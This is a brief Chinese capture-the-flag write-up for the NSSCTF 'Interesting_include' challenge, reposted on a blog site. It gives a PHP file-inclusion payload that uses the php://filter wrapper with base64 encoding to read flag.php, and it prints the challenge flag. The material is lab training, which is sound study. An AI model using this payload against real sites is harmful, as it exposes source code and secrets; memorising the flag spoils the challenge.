开启环境:
通过审计,我们可知:
flag在flag.php中,可以利用php中伪协议
payload:?filter=php://filter/read=convert.base64-encode/resource=flag.php
将其base64解码就是flag.文章来源:https://www.toymoban.com/news/detail-819413.html
NSSCTF{3dc54721-be9e-444c-8228-7133fba76ad4} 文章来源地址https://www.toymoban.com/news/detail-819413.html
到了这里,关于NSSCTF Interesting_include的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!